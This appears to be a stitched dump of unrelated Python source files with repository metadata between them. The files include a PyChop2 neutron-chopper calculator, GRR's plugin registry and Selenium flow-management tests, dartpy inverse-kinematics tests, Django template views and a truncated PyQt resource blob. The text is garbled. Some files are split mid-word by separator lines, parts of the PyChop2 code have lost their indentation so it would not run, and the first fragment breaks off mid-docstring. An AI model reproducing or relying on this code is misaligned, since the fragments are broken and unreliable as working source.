'LETINTERMED': ISISDisk, # LET, medium flux configuration
'LETHIRES': ISISDisk, # LET, low flux configuration
'MAPS': ISISFermi,
'MARI': ISISFermi,
'MERLIN': ISISFermi}
__MultiRepClasses = {
'LET': ISISDisk, # LET default
'LETHIFLUX': ISISDisk, # LET, high flux configuration
'LETINTERMED': ISISDisk, # LET, medium flux configuration
'LETHIRES': ISISDisk, # LET, low flux configuration
'MERLIN': ISISDisk,
'MAPS': ISISDisk,
'MARI': ISISDisk}
    def __init__(self, instname, *args):
        """
        ! Creates a calculator for instrument `instname` (case-insensitive);
        ! any extra args are forwarded to the implementation class constructor.
        ! Raises ValueError for unrecognised instrument names.
        """
        warnings.warn("The PyChop2 class is deprecated and will be removed in the next Mantid version. "
                      "Please use the Instrument class or the official PyChop CLI interface.", DeprecationWarning)
        instname = instname.upper()
        if instname not in self.__Classes.keys():
            raise ValueError('Instrument %s not recognised' % (instname))
        self.object = self.__Classes[instname](instname, *args)
        self.instname = instname
    def allowedInstruments(self):
        """
        ! Returns a list of currently implemented instruments
        ! (the keys of the instrument-name -> implementation-class map)
        """
        return self.__Classes.keys()
def setInstrument(self, *args):
"""
! Sets the instrument to calculate for
"""
if self.__Classes[args[0]] != self.__Classes[self.instname]:
self.object = self.__Classes[args[0]](*args)
else:
self.object.setInstrument(*args)
self.instname = args[0]
    def setChopper(self, *args):
        """
        ! Sets the chopper rotor (Fermi instruments) or instrument configuration
        ! (disk instruments); args are forwarded to the implementation class.
        """
        self.object.setChopper(*args)
    def getChopper(self):
        """
        ! Returns the currently set chopper rotor or instrument configuration
        """
        return self.object.getChopper()
    def setFrequency(self, *args, **kwargs):
        """
        ! Sets the chopper frequency(ies)
        """
        self.object.setFrequency(*args, **kwargs)
    def getFrequency(self):
        """
        ! Returns (a list of) the current chopper frequency(ies)
        """
        return self.object.getFrequency()
    def setEi(self, *args):
        """
        ! Sets the desired or focused incident energy
        """
        self.object.setEi(*args)
    def getEi(self, *args):
        """
        ! Returns the currently set desired or focused incident energy
        """
        return self.object.getEi(*args)
    def getObject(self):
        """
        ! Returns the object instance which actually handles the calculation.
        ! This object's type is a subclass specific to Fermi or Disk instruments and will have
        ! additional methods specific to the class.
        """
        return self.object
    def getResolution(self, *args):
        """
        ! Returns the energy resolution as a function of energy transfer
        !
        ! .getResolution() - if Ei is set, calculates for [0.05Ei,0.95Ei] in 20 steps
        ! .getResolution(Etrans) - if Ei is set, calculates for Etrans energy transfer
        ! .getResolution(Etrans, Ei) - calculates for an Ei different from that set previously
        """
        return self.object.getResolution(*args)
    def getFlux(self, *args):
        """
        ! Returns (an estimate of) the neutron flux at the sample at the set Ei in n/cm^2/s
        """
        return self.object.getFlux(*args)
    def getResFlux(self, *args):
        """
        ! Returns a tuple of the (resolution, flux)
        """
        return self.object.getResFlux(*args)
    def getWidths(self, *args):
        """
        ! Returns the individual time widths that go into the calculated energy widths as a dict
        """
        return self.object.getWidths(*args)
def __getMultiRepObject(self):
"""
Private method to obtain multi-rep information
"""
if self.instname not in self.__MultiRepClasses.keys():
raise ValueError('Instrument %s does not support multirep mode')
if self.__MultiRepClasses[self.instname] == self.__Classes[self.instname]:
obj = self.object
else:
obj = self.__MultiRepClasses[self.instname](self.instname)
obj.setChopper(self.object.getChopper())
obj.setFrequency(self.object.getFrequency(), Chopper2Phase=self.object.diskchopper_phase)
obj.setEi(self.object.getEi())
return obj
    def getAllowedEi(self, *args):
        """
        ! For instruments which support multi-rep mode, returns a list of allowed incident energies
        """
        return self.__getMultiRepObject().getAllowedEi(*args)
    def getMultiRepResolution(self, *args):
        """
        ! For instruments which support multi-rep mode, returns the resolution for each rep
        """
        return self.__getMultiRepObject().getMultiRepResolution(*args)
    def getMultiRepFlux(self, *args):
        """
        ! For instruments which support multi-rep mode, returns the flux for each rep
        """
        return self.__getMultiRepObject().getMultiRepFlux(*args)
    def getMultiWidths(self, *args):
        """
        ! Returns the individual time widths that go into the calculated energy
        ! widths as a dict, for each multi-rep incident energy
        """
        return self.__getMultiRepObject().getMultiWidths(*args)
    def plotMultiRepFrame(self, *args):
        """
        ! For instruments which support multi-rep mode, plots the time-distance diagram
        """
        return self.__getMultiRepObject().plotFrame(*args)
@classmethod
def calculate(cls, *args, **kwargs):
"""
! Calculates the resolution and flux directly (without setting up a PyChop2 object)
!
! PyChop2.calculate('mari', 's', 250., 55.) # Instname, Chopper Type, Freq, Ei in order
! PyChop2.calculate('let', 180, 2.2) # For LET, chopper type is not needed.
! PyChop2.calculate('let', [160., 80.], 1.) # For LET, specify resolution and pulse remover freq
! PyChop2.calculate('let', 'High flux', 80, 2.2) # LET default is medium flux configuration
! PyChop2.calculate(inst='mari', chtyp='s', freq=250., ei=55.) # With keyword arguments
! PyChop2.calculate(inst='let', variant='High resolution', freq=[160., 80.], ei=2.2)
!
! For LET, the allowed variant names are:
! 'With Chopper 3'
! 'Without Chopper 3'
! You have to use these strings exactly.
!
! By default this function returns the elastic resolution and flux only.
! If you want the inelastic resolution, specify the inelastic energy transfer
! as either the last positional argument, or as a keyword argument, e.g.:
!
! PyChop2.calculate('merlin', 'g', 450., 60., range(55))
! PyChop2.calculate('maps', 'a', 450., 600., etrans=np.linspace(0,550,55))
!
! The results a
|
opencord/voltha
|
voltha/northbound/rpc_dispatcher.py
|
Python
|
apache-2.0
| 803
| 0
|
#
# Copyright 2017 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unles
|
s required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
RPC request dispatcher
"""
from twisted.internet.defer import DeferredQueue
class RpcDispatcher(object):
    """Northbound RPC request dispatcher (stub, work in progress).

    NOTE(review): the queue presumably buffers incoming RPC requests for
    asynchronous handling -- confirm once the dispatch logic is added.
    """
    def __init__(self):
        # Twisted DeferredQueue: get() returns a Deferred that fires when an
        # item is put, allowing asynchronous consumption.
        self.queue = DeferredQueue()
#
|
work in progress
|
MiniSEC/GRR_clone
|
lib/registry.py
|
Python
|
apache-2.0
| 5,555
| 0.009541
|
#!/usr/bin/env python
"""This is the GRR class registry.
A central place responsible for registring plugins. Any class can have plugins
if it defines __metaclass__ = MetaclassRegistry. Any derived class from this
baseclass will have the member classes as a dict containing class name by key
and class as value.
"""
# The following are abstract base classes
import abc
import threading
import logging
# This is required to monkey patch various older libraries so
# pylint: disable=unused-import
from grr.lib import compatibility
# pylint: enable=unused-import
class MetaclassRegistry(abc.ABCMeta):
  """Automatic Plugin Registration through metaclasses.
  Every concrete class built with this metaclass is recorded in a `classes`
  dict (class name -> class) shared with its top level base class, so plugins
  register themselves simply by being defined/imported. Classes named
  Abstract<Name> or carrying a private __abstract attribute are skipped.
  """
  def __init__(cls, name, bases, env_dict):
    abc.ABCMeta.__init__(cls, name, bases, env_dict)
    # Abstract classes should not be registered. We define classes as abstract
    # by giving them the __abstract attribute (this is not inheritable) or by
    # naming them Abstract<ClassName>.
    abstract_attribute = "_%s__abstract" % name
    if (not cls.__name__.startswith("Abstract") and
        not hasattr(cls, abstract_attribute)):
      # Attach the classes dict to the baseclass and have all derived classes
      # use the same one:
      for base in bases:
        try:
          cls.classes = base.classes
          cls.classes_by_name = base.classes_by_name
          cls.plugin_feature = base.plugin_feature
          cls.top_level_class = base.top_level_class
          break
        except AttributeError:
          pass
      try:
        if cls.classes and cls.__name__ in cls.classes:
          logging.warn("Duplicate names for registered classes: %s, %s",
                       cls, cls.classes[cls.__name__])
        cls.classes[cls.__name__] = cls
        cls.classes_by_name[getattr(cls, "name", None)] = cls
        cls.class_list.append(cls)
      except AttributeError:
        # First registration in this hierarchy: create the shared registries.
        cls.classes = {cls.__name__: cls}
        cls.classes_by_name = {getattr(cls, "name", None): cls}
        cls.class_list = [cls]
        cls.plugin_feature = cls.__name__
        # Keep a reference to the top level class
        cls.top_level_class = cls
      try:
        # Optionally expose each plugin as an attribute of the top level class.
        if cls.top_level_class.include_plugins_as_attributes:
          setattr(cls.top_level_class, cls.__name__, cls)
      except AttributeError:
        pass
  def NewPlugin(cls, name):
    """Return the class of the implementation that carries that name.
    Args:
      name: The name of the plugin to return.
    Raises:
      KeyError: If the plugin does not exist.
    Returns:
      The registered class referred to by the name.
    """
    return cls.classes[name]
# Utility functions
class HookRegistry(object):
  """An initializer that can be extended by plugins.
  Any classes which extend this will be instantiated exactly once when the
  system is initialized. This allows plugin modules to register initialization
  routines.
  """
  # A list of class names that have to be initialized before this hook.
  pre = []
  # Hooks whose RunOnce() has already been invoked in this process.
  already_run_once = set()
  lock = threading.RLock()
  def _RunSingleHook(self, hook, done, required=None):
    """Run `hook` after recursively running all of its prerequisites."""
    if hook in done:
      return
    # Run every declared prerequisite hook first.
    for dep_name in hook.pre:
      dep = self.classes.get(dep_name)
      if dep is None:
        raise RuntimeError("Pre Init Hook %s in %s could not"
                           " be found. Missing import?" % (dep_name, hook))
      self._RunSingleHook(self.classes[dep_name], done,
                          required=hook.__name__)
    instance = hook()
    if required:
      logging.debug("Initializing %s, required by %s",
                    hook.__name__, required)
    else:
      logging.debug("Initializing %s", hook.__name__)
    # Run() fires on every Init() pass; RunOnce() at most once per process.
    instance.Run()
    done.add(hook)
    if hook not in self.already_run_once:
      instance.RunOnce()
      self.already_run_once.add(hook)
  def _RunAllHooks(self, done):
    for hook in self.__class__.classes.values():
      self._RunSingleHook(hook, done)
  def Init(self):
    with InitHook.lock:
      done = set()
      while True:
        try:
          # Init hooks may import modules that define further hooks, so keep
          # sweeping until a pass runs nothing new; each hook still runs at
          # most once per Init().
          before = len(done)
          self._RunAllHooks(done)
          if before == len(done):
            break
        except StopIteration:
          logging.debug("Recalculating Hook dependency.")
  def RunOnce(self):
    """Hooks which only want to be run once."""
  def Run(self):
    """Hooks that can be called more than once."""
class InitHook(HookRegistry):
  """Global GRR init registry.
  Any classes which extend this class will be instantiated exactly
  once when the system is initialized. This allows plugin modules to
  register initialization routines.
  """
  # Registers every subclass into InitHook.classes via the metaclass.
  __metaclass__ = MetaclassRegistry
# This method is only used in tests and will rerun all the hooks to create a
# clean state.
def TestInit():
  """Re-run all registered hooks to produce a clean state (test use only)."""
  InitHook().Init()
def Init():
  """Run all registered InitHooks; a no-op if hooks already ran once."""
  if InitHook.already_run_once:
    return
  # This initializes any class which inherits from InitHook.
  InitHook().Init()
|
dartsim/dart
|
python/tests/unit/dynamics/test_inverse_kinematics.py
|
Python
|
bsd-2-clause
| 2,669
| 0.000749
|
import math
import platform

import numpy as np
import pytest

import dartpy as dart
def test_solve_for_free_joint():
    '''
    Very simple test of InverseKinematics module, applied to a FreeJoint to
    ensure that the target is reachable
    '''
    skel = dart.dynamics.Skeleton()
    [joint0, body0] = skel.createFreeJointAndBodyNodePair()

    ik = body0.getOrCreateIK()
    assert ik.isActive()

    # Target pose: 0.8 along z plus a pi/8 rotation about y.
    tf = dart.math.Isometry3()
    tf.set_translation([0, 0, 0.8])
    tf.set_rotation(dart.math.AngleAxis(math.pi / 8.0, [0, 1, 0]).to_rotation_matrix())
    ik.getTarget().setTransform(tf)

    error_method = ik.getErrorMethod()
    assert error_method.getMethodName() == 'TaskSpaceRegion'

    [lb, ub] = error_method.getBounds()
    # Bug fix: compare with '==' rather than 'is'. Identity checks against
    # an int literal only pass by accident of CPython's small-int cache.
    assert len(lb) == 6
    assert len(ub) == 6

    # Tighten the bounds so the solver must match the target very closely.
    error_method.setBounds(np.ones(6) * -1e-8, np.ones(6) * 1e-8)
    [lb, ub] = error_method.getBounds()
    assert lb == pytest.approx(-1e-8)
    assert ub == pytest.approx(1e-8)

    solver = ik.getSolver()
    solver.setNumMaxIterations(100)
    prob = ik.getProblem()  # kept: may lazily create the IK problem - TODO confirm

    # Before solving, the body must not already be at the target.
    tf_actual = ik.getTarget().getTransform().matrix()
    tf_expected = body0.getTransform().matrix()
    assert not np.isclose(tf_actual, tf_expected).all()

    success = solver.solve()
    assert success

    # After a successful solve the body pose matches the target.
    tf_actual = ik.getTarget().getTransform().matrix()
    tf_expected = body0.getTransform().matrix()
    assert np.isclose(tf_actual, tf_expected).all()
class FailingSolver(dart.optimizer.Solver):
    """A Solver stub that always reports failure.

    Each solve() call writes a constant-valued vector into the problem's
    optimal solution and then returns False.
    """

    def __init__(self, constant):
        super(FailingSolver, self).__init__()
        self.constant = constant

    def solve(self):
        problem = self.getProblem()
        if problem is None:
            print('[FailingSolver::solve] Attempting to solve a nullptr problem! We will return false.')
            return False
        # Deliberately record a wrong solution before signalling failure.
        problem.setOptimalSolution(np.ones(problem.getDimension()) * self.constant)
        return False

    def getType(self):
        return 'FailingSolver'

    def clone(self):
        return FailingSolver(self.constant)
def test_do_not_apply_solution_on_failure():
    """A failing solver must not mutate positions unless incomplete results are allowed."""
    skel = dart.dynamics.Skeleton()
    [joint, body] = skel.createFreeJointAndBodyNodePair()
    ik = body.getIK(True)
    solver = FailingSolver(10)
    ik.setSolver(solver)
    dofs = skel.getNumDofs()
    skel.resetPositions()
    # Failure with allowIncompleteResult=False: positions stay at zero.
    assert not ik.solveAndApply(allowIncompleteResult=False)
    assert np.isclose(skel.getPositions(), np.zeros(dofs)).all()
    # Failure with allowIncompleteResult=True: the (wrong) partial solution
    # from FailingSolver is applied, so positions are no longer zero.
    assert not ik.solveAndApply(allowIncompleteResult=True)
    assert not np.isclose(skel.getPositions(), np.zeros(dofs)).all()
if __name__ == "__main__":
pytest.main()
|
antonow/concept-to-clinic
|
interface/backend/cases/apps.py
|
Python
|
mit
| 85
| 0
|
from django.apps import AppConfig
class CasesConfig(AppConfig):
    """Django application configuration for the 'cases' app."""

    # Name used by Django's app registry to identify this application.
    name = 'cases'
|
destijl/grr
|
grr/gui/plugins/flow_management_test.py
|
Python
|
apache-2.0
| 14,194
| 0.003382
|
#!/usr/bin/env python
"""Test the flow_management interface."""
import os
from grr.gui import gui_test_lib
from grr.gui import runtests_test
from grr.lib import action_mocks
from grr.lib import aff4
from grr.lib import flags
from grr.lib import flow
from grr.lib import hunts
from grr.lib import test_lib
from grr.lib.flows.general import filesystem as flows_filesystem
from grr.lib.flows.general import processes as flows_processes
from grr.lib.flows.general import transfer as flows_transfer
from grr.lib.flows.general import webhistory as flows_webhistory
from grr.lib.hunts import standard
from grr.lib.hunts import standard_test
from grr.lib.rdfvalues import client as rdf_client
from grr.lib.rdfvalues import flows as rdf_flows
from grr.lib.rdfvalues import paths as rdf_paths
class TestFlowManagement(gui_test_lib.GRRSeleniumTest,
standard_test.StandardHuntTestMixin):
"""Test the flow management GUI."""
  def setUp(self):
    """Creates an approved test client with a known hostname."""
    super(TestFlowManagement, self).setUp()
    with self.ACLChecksDisabled():
      self.client_id = rdf_client.ClientURN("C.0000000000000001")
      with aff4.FACTORY.Open(
          self.client_id, mode="rw", token=self.token) as client:
        client.Set(client.Schema.HOSTNAME("HostC.0000000000000001"))
      self.RequestAndGrantClientApproval(self.client_id)
    # Client mock answering FileFinder actions for flows run in tests.
    self.action_mock = action_mocks.FileFinderClientMock()
  def testOpeningManageFlowsOfUnapprovedClientRedirectsToHostInfoPage(self):
    """Opening the flows view without an approval redirects to host info."""
    self.Open("/#/clients/C.0000000000000002/flows/")
    # As we don't have an approval for C.0000000000000002, we should be
    # redirected to the host info page.
    self.WaitUntilEqual("/#/clients/C.0000000000000002/host-info",
                        self.GetCurrentUrlPath)
    self.WaitUntil(self.IsTextPresent,
                   "You do not have an approval for this client.")
  def testPageTitleReflectsSelectedFlow(self):
    """Page title shows the client id, then the selected flow's basename."""
    pathspec = rdf_paths.PathSpec(
        path=os.path.join(self.base_path, "test.plist"),
        pathtype=rdf_paths.PathSpec.PathType.OS)
    flow_urn = flow.GRRFlow.StartFlow(
        flow_name=flows_transfer.GetFile.__name__,
        client_id=self.client_id,
        pathspec=pathspec,
        token=self.token)
    self.Open("/#/clients/C.0000000000000001/flows/")
    self.WaitUntilEqual("GRR | C.0000000000000001 | Flows", self.GetPageTitle)
    # Selecting a flow row switches the title to that flow's id.
    self.Click("css=td:contains('GetFile')")
    self.WaitUntilEqual("GRR | C.0000000000000001 | " + flow_urn.Basename(),
                        self.GetPageTitle)
  def testFlowManagement(self):
    """Test that scheduling flows works.

    Walks the UI end to end: find the client, launch ListProcesses and
    GetFile, then verify that flows (including a nested RecursiveTestFlow)
    show up in the flow list and that GetFile issued a StatFile request.
    """
    self.Open("/")
    self.Type("client_query", "C.0000000000000001")
    self.Click("client_query_submit")
    self.WaitUntilEqual(u"C.0000000000000001", self.GetText,
                        "css=span[type=subject]")
    # Choose client 1
    self.Click("css=td:contains('0001')")
    # First screen should be the Host Information already.
    self.WaitUntil(self.IsTextPresent, "HostC.0000000000000001")
    self.Click("css=a[grrtarget='client.launchFlows']")
    self.Click("css=#_Processes")
    self.Click("link=" + flows_processes.ListProcesses.__name__)
    self.WaitUntil(self.IsTextPresent, "C.0000000000000001")
    self.WaitUntil(self.IsTextPresent, "List running processes on a system.")
    self.Click("css=button.Launch")
    self.WaitUntil(self.IsTextPresent, "Launched Flow ListProcesses")
    self.Click("css=#_Browser")
    # Wait until the tree has expanded.
    self.WaitUntil(self.IsTextPresent, flows_webhistory.FirefoxHistory.__name__)
    # Check that we can get a file in chinese
    self.Click("css=#_Filesystem")
    # Wait until the tree has expanded.
    self.WaitUntil(self.IsTextPresent,
                   flows_filesystem.UpdateSparseImageChunks.__name__)
    self.Click("link=" + flows_transfer.GetFile.__name__)
    self.Select("css=.form-group:has(> label:contains('Pathtype')) select",
                "OS")
    self.Type("css=.form-group:has(> label:contains('Path')) input",
              u"/dev/c/msn[1].exe")
    self.Click("css=button.Launch")
    self.WaitUntil(self.IsTextPresent, "Launched Flow GetFile")
    # Test that recursive tests are shown in a tree table.
    with self.ACLChecksDisabled():
      flow.GRRFlow.StartFlow(
          client_id="aff4:/C.0000000000000001",
          flow_name=gui_test_lib.RecursiveTestFlow.__name__,
          token=self.token)
    self.Click("css=a[grrtarget='client.flows']")
    # Some rows are present in the DOM but hidden because parent flow row
    # wasn't expanded yet. Due to this, we have to explicitly filter rows
    # with "visible" jQuery filter.
    self.WaitUntilEqual("RecursiveTestFlow", self.GetText,
                        "css=grr-client-flows-list tr:visible:nth(1) td:nth(2)")
    self.WaitUntilEqual("GetFile", self.GetText,
                        "css=grr-client-flows-list tr:visible:nth(2) td:nth(2)")
    # Click on the first tree_closed to open it.
    self.Click("css=grr-client-flows-list tr:visible:nth(1) .tree_closed")
    self.WaitUntilEqual("RecursiveTestFlow", self.GetText,
                        "css=grr-client-flows-list tr:visible:nth(2) td:nth(2)")
    # Select the requests tab
    self.Click("css=td:contains(GetFile)")
    self.Click("css=li[heading=Requests]")
    self.WaitUntil(self.IsElementPresent,
                   "css=td:contains(flow:request:00000001)")
    # Check that a StatFile client action was issued as part of the GetFile
    # flow.
    self.WaitUntil(self.IsElementPresent,
                   "css=.tab-content td.proto_value:contains(StatFile)")
  def testOverviewIsShownForNestedFlows(self):
    """Nested flows show an overview with a two-component flow id."""
    with self.ACLChecksDisabled():
      for _ in test_lib.TestFlowHelper(
          gui_test_lib.RecursiveTestFlow.__name__,
          self.action_mock,
          client_id=self.client_id,
          token=self.token):
        pass
    self.Open("/#c=C.0000000000000001")
    self.Click("css=a[grrtarget='client.flows']")
    # There should be a RecursiveTestFlow in the list. Expand nested flows.
    self.Click("css=tr:contains('RecursiveTestFlow') span.tree_branch")
    # Click on a nested flow.
    self.Click("css=tr:contains('RecursiveTestFlow'):nth(2)")
    # Nested flow should have Depth argument set to 1.
    self.WaitUntil(self.IsElementPresent,
                   "css=td:contains('Depth') ~ td:nth(0):contains('1')")
    # Check that flow id of this flow has forward slash - i.e. consists of
    # 2 components.
    self.WaitUntil(self.IsTextPresent, "Flow ID")
    flow_id = self.GetText("css=dt:contains('Flow ID') ~ dd:nth(0)")
    self.assertTrue("/" in flow_id)
def testOverviewIsShownForNestedHuntFlows(self):
with self.ACLChecksDisabled():
|
with hunts.GRRHunt.StartHunt(
hunt_name=standard.GenericHunt.__name__,
flow_runner_args=rdf_flows.FlowRunnerArgs(
flow_name=gui_test_lib.RecursiveTestFlow.__name__),
client_rate=0,
token=self.token) as hunt:
hunt.Run()
self.AssignTasksToClients(client_ids=[self.client_id])
self.RunHunt(client_ids=[self.client_id])
self.Open("/#c=C.0000000000000001")
self.Click("css=a[grrtarget='c
|
lient.flows']")
# There should be a RecursiveTestFlow in the list. Expand nested flows.
self.Click("css=tr:contains('RecursiveTestFlow') span.tree_branch")
# Click on a nested flow.
self.Click("css=tr:contains('RecursiveTestFlow'):nth(2)")
# Nested flow should have Depth argument set to 1.
self.WaitUntil(self.IsElementPresent,
"css=td:contains('Depth') ~ td:nth(0):contains('1')")
# Check that flow id of this flow has forward slash - i.e. consists of
# 2 components.
self.WaitUntil(self.IsTextPresent, "Flow ID")
flow_id = self.GetText("css=dt:contains('Flow ID') ~ dd:nth(0)")
self.assertTrue("/" in flow_id)
def testLogsCanBeOpenedByClickingOnLogsTab(self):
# RecursiveTestFlow doesn't send any results back.
with self.ACLChecksDisabled():
for _ in test_lib.TestFlowHelper(
"FlowWithOneLogStatement",
self.action_mock,
client_id=self.clien
|
chenqi123/ipaas
|
example/views.py
|
Python
|
apache-2.0
| 6,131
| 0.047953
|
from django.shortcuts import render
# Create your views here.
def proindex(request):
return render(request, 'example/probase.html' )
def index(request):
return render(request, 'e_index.html' )
def badges_labels(request):
return render(request, 'badges_labels.html' )
def four(request):
return render(request, '404.html' )
def five(request):
return render(request, '500.html' )
def basic_gallery(request):
return render(request, 'basic_gallery.html' )
def buttons(request):
return render(request, 'buttons.html' )
def calendar(request):
return render(request, 'calendar.html' )
def carousel(request):
return render(request, 'carousel.html' )
def chat_view(request):
return render(request, 'chat_view.html' )
def code_editor(request):
return render(request, 'code_editor.html' )
def contacts(request):
return render(request, 'contacts.html' )
def css_animation(request):
return render(request, 'css_animation.html' )
def draggable_panels(request):
return render(request, 'draggable_panels.html' )
def empty_page(request):
return render(request, 'empty_page.html' )
def faq(request):
return render(request, 'faq.html' )
def file_manager(request):
return render(request, 'file_manager.html' )
def form_advanced(request):
return render(request, 'form_advanced.html' )
def form_avatar(request):
return render(request, 'form_avatar.html' )
def form_basic(request):
return render(request, 'form_basic.html' )
def form_builder(request):
return render(request, 'form_builder.html' )
def form_editors(request):
return render(request, 'form_editors.html' )
def form_file_upload(request):
return render(request, 'form_file_upload.html' )
def form_markdown(request):
return render(request, 'form_markdown.html' )
def form_simditor(request):
return render(request, 'form_simditor.html' )
def form_validate(request):
return render(request, 'form_validate.html' )
def form_webuploader(request):
return render(request, 'form_webuploader.html' )
def form_wizard(request):
return render(request, 'form_wizard.html' )
def forum_main(request):
return render(request, 'forum_main.html' )
def graph_echarts(request):
return render(request, 'graph_echarts.html' )
def graph_flot(request):
return render(request, 'graph_flot.html' )
def graph_morris(request):
return render(request, 'graph_morris.html' )
def graph_peity(request):
return render(request, 'graph_peity.html' )
def graph_rickshaw(request):
return render(request, 'graph_rickshaw.html' )
def graph_sparkline(request):
return render(request, 'graph_sparkline.html' )
def grid_options(request):
return render(request, 'grid_options.html' )
def iconfont(request):
return render(request, 'iconfont.html' )
def icons(request):
return render(request, 'icons.html' )
def index_1(request):
return render(request, 'index_1.html' )
def index_2(request):
return render(request, 'index_2.html' )
def index_3(request):
return render(request, 'index_3.html' )
def index_4(request):
return render(request, 'index_4.html' )
def invoice(request):
return render(request, 'invoice.html' )
def invoice_print(request):
return render(request, 'invoice_print.html' )
def layer(request):
return render(request, 'layer.html' )
def layerdate(request):
return render(request, 'layerdate.html' )
def layouts(request):
    """Renders the static layouts demo page."""
    return render(request, 'layouts.html')
def lockscreen(request):
return render(request, 'lockscreen.html' )
def login(request):
return render(request, 'login.html' )
def mailbox(request):
    """Renders the static mailbox demo page."""
    return render(request, 'mailbox.html')
def mail_compose(request):
return render(request, 'mail_compose.html' )
def mail_detail(request):
return render(request, 'mail_detail.html' )
def modal_window(request):
return render(request, 'modal_window.html' )
def nestable_list(request):
return render(request, 'nestable_list.html' )
def notifications(request):
return render(request, 'notifications.html' )
def pin_board(request):
return render(request, 'pin_board.html' )
def profile(request):
return render(request, 'profile.html' )
def projects(request):
return render(request, 'projects.html' )
def project_detail(request):
return render(request, 'project_detail.html' )
def register(request):
return render(request, 'register.html' )
def search_results(request):
return render(request, 'search_results.html' )
def table_basic(request):
return render(request, 'table_basic.html' )
def table_data_tables(request):
return render(request, 'table_data_tables.html' )
def table_jqgrid(request):
return render(request, 'table_jqgrid.html' )
def tabs_panels(request):
return render(request, 'tabs_panels.html' )
def timeline(request):
return render(request, 'timeline.html' )
def timeline_v2(request):
return render(request, 'timeline_v2.html' )
def toastr_notifications(request):
return render(request, 'toastr_notifications.html' )
def tree_view(request):
return render(request, 'tree_view.html' )
def tree_view_v2(request):
return render(request, 'tree_view_v2.html' )
def typography(request):
return render(request, 'typography.html' )
def validation(request):
return render(request, 'validation.html' )
def webim(request):
return render(request, 'webim.html' )
def widgets(request):
return render(request, 'widgets.html' )
|
splotz90/urh
|
src/urh/ui/urh_rc.py
|
Python
|
gpl-3.0
| 463,208
| 0.000011
|
# -*- coding: utf-8 -*-
# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.9.2)
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore
qt_resource_data = b"\
\x00\x00\x07\x27\
\x00\
\x00\x1a\x8b\x78\x9c\xe5\x58\xdd\x8f\xdb\x36\x12\x7f\xdf\xbf\x82\
\x55\x1f\xd2\x43\x2d\x8a\xa4\x3e\x28\x69\xed\x2d\xd0\xa4\x69\xf2\
\x50\xa0\x68\xd2\x14\xb8\x37\xad\x44\xdb\xba\xe8\xc3\x90\xe4\xb5\
\x9d\xbf\xfe\x86\xd4\x07\x29\xdb\x1b\x5f\x0e\xc5\x3d\xdc\x0a\xbb\
\x58\x71\x38\xc3\x99\xe1\x0c\x7f\x3f\x6a\x97\x3f\x1d\xcb\x02\x3d\
\x89\xa6\xcd\xeb\x6a\x65\x51\x4c\x2c\x24\xaa\xb4\xce\xf2\x6a\xb3\
\xb2\xfe\xfc\xf8\xd6\x0e\x2d\xd4\x76\x49\x95\x25\x45\x5d\x89\x95\
\x55\xd5\xd6\x4f\x0f\x77\xcb\xef\x6c\x1b\xbd\x6e\x44\xd2\x89\x0c\
\x1d\xf2\x6e\x8b\xde\x57\x9f\xdb\x34\xd9\x09\xf4\xc3\xb6\xeb\x76\
\xb1\xe3\x1c\x0e\x07\x9c\x0f\x42\x5c\x37\x1b\xe7\x1f\xc8\xb6\x1f\
\xee\xee\x96\xed\xd3\xe6\x0e\x21\x04\x7e\xab\x36\xce\xd2\x95\x35\
\x18\xec\xf6\x4d\xa1\x14\xb3\xd4\x11\x85\x28\x45\xd5\xb5\x0e\xc5\
\xd4\xb1\xb4\x7a\xaa\xd5\x53\xe9\x3d\x7f\x12\x69\x5d\x96\x75\xd5\
\x2a\xcb\xaa\xfd\xde\x50\x6e\xb2\xf5\xa4\x2d\xa3\x39\xb8\x4a\x89\
\x46\x51\xe4\x10\xe6\x30\x66\x83\x86\xdd\x9e\xaa\x2e\x39\xda\x73\
\x53\x88\xf1\x9a\x29\x23\x84\x38\x30\xa7\x35\xff\x33\xad\xb8\x85\
\x0d\xdd\xc1\xef\xa4\x3e\x0a\x70\x5b\xef\x9b\x54\xac\xc1\x4e\xe0\
\x4a\x74\xce\x9b\x8f\x6f\xa6\x49\x9b\xe0\xac\xcb\x8c\x65\xc6\xfd\
\x9c\x79\x9d\x6d\x72\x95\x94\xa2\xdd\x25\xa9\x68\x9d\x51\xae\xec\
\x0f\x79\xd6\x6d\xa1\xbe\xc1\xee\xa8\xc6\x5b\x91\x6f\xb6\x9d\x21\
\x78\xca\xc5\xe1\xe7\xfa\xb8\xb2\x08\x22\x88\x06\xf0\xd3\x8b\x75\
\x67\x50\x25\xc8\xb3\x95\xf5\xe1\xd3\xaf\x7f\xd4\x75\xd7\x8f\x07\
\x2f\xf1\xa4\x49\x70\xc4\x30\x45\x8d\x9a\x1e\x53\x89\xb3\x3a\x95\
\xb1\xad\xac\x4c\xf4\xdd\x85\xc7\x1d\x9a\x56\x10\xc7\x5d\xdd\x74\
\xf6\x3a\x2f\x44\xaf\xea\x6c\xeb\x52\x38\xff\xaa\x85\xf3\xeb\xfb\
\x8f\xce\xbe\xd9\x3a\x59\xd2\x25\x4e\x9e\x42\xbd\x1d\x73\x1d\xbc\
\xab\xae\xaf\x75\xcc\x76\xb0\xe7\x91\x87\xc3\x10\xaa\x1e\x5d\xd5\
\x39\x9d\xe9\x3c\x80\xd2\x72\x8a\x5b\x46\x92\xc9\xcd\x91\xa6\x7d\
\xfa\x8f\x49\xdb\x6f\x2a\x42\xbb\x64\x03\x61\x14\x75\xb3\xb2\xbe\
\x5f\xab\x67\x98\x78\xac\x9b\x4c\x34\xe3\x54\xa0\x9e\xd9\x54\x0d\
\x45\xca\xbb\x53\x7f\xe4\x86\xb5\xc7\xc0\xe4\xaa\xd3\x3c\xb9\x3e\
\xdf\x6e\x93\xac\x3e\xac\x2c\x76\x3e\xf9\xa5\xae\x4b\x59\xd7\x73\
\x79\x0a\xb5\x65\x38\xf4\x5c\xee\x5f\x4c\x81\x1b\x06\x7e\x02\x76\
\x31\x05\x65\xdb\xcb\x93\x68\xef\xab\xbc\x83\x6e\x1f\xba\xc5\x34\
\xde\x37\x8d\x54\x28\x92\x93\x80\x5c\xd5\x9f\x31\xa8\x76\x5b\x1f\
